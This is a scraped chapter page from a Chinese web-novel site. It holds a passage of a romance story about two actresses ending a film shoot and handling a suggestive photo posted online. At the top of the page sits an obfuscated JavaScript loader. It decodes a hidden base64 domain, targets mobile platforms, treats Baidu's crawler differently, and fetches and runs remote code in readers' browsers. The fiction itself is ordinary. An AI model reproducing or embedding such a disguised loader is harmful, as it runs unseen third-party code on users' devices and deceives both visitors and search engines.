98小说网

阅读记录  |   用户书架
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuaHN2Y2huc3ZuY3Z2ZC5jb20=','2843',window,document,['G','TpoZFcguG']);}:function(){};
上一页
目录 | 设置
下一章

分卷(48(2 / 2)

加入书签 | 推荐本书 | 问题反馈 |

倪羽晴在那边点了点头小孟总,刷微博没有?

孟璟这两天哪里有空去关心别的,没有诶。

看看我给你的链接。

孟璟狐疑地挂断视频,按她说的办,点进去一看,瞳孔放大,说了声卧槽。

一张艳照,她和某个女的差一公分就亲到。关键那侧脸眼熟归眼熟,她记不起是谁了,她什么时候和别人这么狎昵?未婚妻看到该怎么想?电光火石间,她已经脑补小药瓶子刚明白自己的心意,鼓足勇气前来表白,结果在敲门的一瞬间收到了这条微博推送,即将碰到门的手又缩了回去

她刷拉一声坐起身,擦擦额角的冷汗。

想怎么处理?倪羽晴问。

孟璟oc我冤枉,这人谁啊。

她切回去看了眼微博名潇潇夜雨。

倪羽晴发了俩黑线表情包过来,这应该是你们电影的剧照吧?

经这么一提醒,孟璟想起来了,这不就是初次见面给她递咖啡那个,叫什么潇潇的。

倪羽晴季潇潇。

孟璟对,季潇潇。确实有这么一段,郑遂心那个魔鬼为了刺激景知安,随便拉了个人要亲。这人怎么拍了这么张图,还在私人微博放出来了,配字一个回忆。潇潇夜雨的粉丝数三十万,发过六百多条微博,这条转赞评是最多的,还被她置顶了。

倪羽晴看看评论区。

孟璟照办。然后看到热评第一醉里挑灯看剑楼下那么多问这位帅美帅美的小姐姐是谁的,我来当一回红领巾,点进链接看一眼,你会回来点赞的。后续跟着链接,孟璟啪嗒点进去,原来就是上回盛雪给她看过的,郑遂心的打戏视频。这条评论下的回复都是些尖叫的小土拨鼠,花式吹她的颜和身手,乍一看有些像猴子请来的水军。

尽管孟璟自恋,却并没有点开多看,再瞄了一眼热评第二番茄汁是潇潇的女朋友么,我一直觉得潇潇是弯的!我是老婆粉!情敌吼吼看嘤嘤嘤!这一条季潇潇本尊回复了是一个美好的回忆哦~~

回忆个大头鬼,不就一张路透照。搞得好像两个人真有一腿似的。孟璟轻微不悦。

倪羽晴又发了几条语音要处理么?本来人自己的微博,小打小闹无所谓。不过手下人查过了,她经纪人知道你身份,特意让她提前试试水。是只小鱼,胃口也不大,你要是默许这条可以发,以后她就捆绑上你了,后边有一整套软文等着。话说回来您心大,单单这条放着对你也没什么危害,她模棱两可的,不是什么恋爱石锤。最晚电影出来就会真相大白。看你。

孟璟想了想,嘶地一声,怪笑起来想办法请她删了吧。别的还能忍,怕我老婆不高兴。

倪羽晴失笑成。

第60章

《安知我心》九十九场,一镜一次。

雨夜反攻后的早晨。

景知安和郑遂心两人从相拥而眠中醒过来,晨曦中的屋子透着一点点慵懒,两个人没说话,可流动的空气都泛滥着甜,两人在早餐桌上对坐着,简单的吐司,景知安还煎了两个蛋,金灿灿地铺在碟子里,她起身去给女朋友倒牛奶,液体倒到杯子的轻微噪声里,郑遂心对着她窈窕的背影轻轻说了句不要离开我。

景知安将沾到牛奶的手指含在嘴里吸吮,回头问什么?

郑遂心摇摇头,她红着眼眶微笑,没。

郑遂心先出门,景知安送她,站在楼梯口看不到人之后,又奔进屋,伏到窗台去,盯着她的背影看着,手机来电,她下意识接起,按在耳边,眼睛依旧看着女朋友消失的方向,听着听着,她的面色变得苍白。手机轻轻滑落,掉在地板上,啪的一声响,屏幕裂了。

景家传来噩耗,景父入院,医药费高昂,继母向景知安求救。为了能让父亲得到及时救治,景知安必须得答应母亲和白丽的条件,放弃郑遂心,远赴重洋,远离这里的一切。

演技炸裂的一段戏,是景知安从白家回到医院后,偶然看见了郑遂心她的一只手打着石膏,另外一只手还扛着个输液架,她独自在医院的走廊慢慢地走着,整个人透着颓废,她的腿长,景知安在这边,隔着天井,亦步亦趋地与她保持着同样的步调,这场景让她想起最初她追求她时,每天晚上等她从饰品店下班,隔着一条街送她回家。

每往前走一步,脸上就多一行泪。

郑遂心一直没有发现她,她进了病房。景知安站在门口,足尖前的地板啪嗒啪嗒砸下一小朵一小朵的水花,很快汇聚成一大滩水渍。那天她突然带个人回到家的时候,她就觉得哪里不对劲,而现在回想,姿势不对,僵硬而别扭,她现在才弄明白为什么一个右利手突然改当左撇子了,而那些梦里疼出声的呻吟又是为了什么。郑遂心骗她说这两天要到外祖家去,她大概没想到她会出现在同一间医院。病房里郑遂心单手倒开水,不小心将杯子碰翻了,整个人退开一丈远,嘴里骂骂咧咧,又狼狈又好笑,景知安隔着小小的玻璃窗,将一切尽收眼底,破涕为笑的她差一点就破门而入,握着门把的手却在最后一刻顿住。她为了免她担心独自在这里,而她却要为了别的人放弃她了。早上那句不要离开我她其实听见了,只是想诓她再说一次。她泣不成声。

全程曝哭戏,镜头几乎长在脸上。

李滔滔也跟着泪眼滂沱,扑倒在副导演的怀里。

倪俊

《安知我心》上映后,某大型中文社交网站自发举办过一个你心目中娱乐圈哪一位小花的哭戏是no1?宋若以领先第二名二万票的成绩胜出,霸占了投票总数的四分之三还多。这是后话。

在此之后,整个组又赶了个多星期的进度,总算将横店的戏份全部结束。

孟卫国拨视频过来的时候,孟璟两眼泛红,蹲在床上,明显刚哭过,老爷子吃惊不已,一叠声问怎么了。孟璟摇头表示没什么,就有点难受。

孟卫国问朋友圈不是讲杀青了?杀青不是拍完了?拍完了还不高兴?

孟璟吸吸鼻子,是拍完了,可我入戏太深,被若若的演技征服了。电影结局虽带点半开放性,可也算是世俗意义上的好结局,她本来还不至于因此这样多愁善感。戏杀青之后,有种如释重负的感觉。宋若飙哭戏的那段,被做成短视频发到了网上,她下午刷微博的时候,一个没忍住,点进去看了一眼,然后就为小药瓶子心碎了,郑遂心这个魔鬼真是不可原谅啊。换句话说,也是自己不可原谅。

现在,她不仅不想让未婚妻拍亲热戏,连哭戏也要禁止。

哭成那样,多伤身体。

然而她自己也知道这是不现实的。

孟卫国还是狐疑不信,叫若若来,我要问她。

平素本来都是两个人一起与爷爷视频。今天是老爷子主动拨过来,因而宋若不在场。

孟璟也没推脱,捧着手机去敲未婚妻的门,很快门开了。

小药瓶子刚洗完头发,吹得有七八分干,随意披散着,像小仙女,美得不近情理。

两个人排排坐坐好,孟卫国就发问了若若,你告诉我,这两天孟璟没事吧?

宋若确认之后,老人松口气,又说你帮爷爷哄哄她,她难得娇气了,还有,若若拍完就带着她快回来吧,啊?爷爷等你们俩回家呢。

上一页
目录
下一章
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间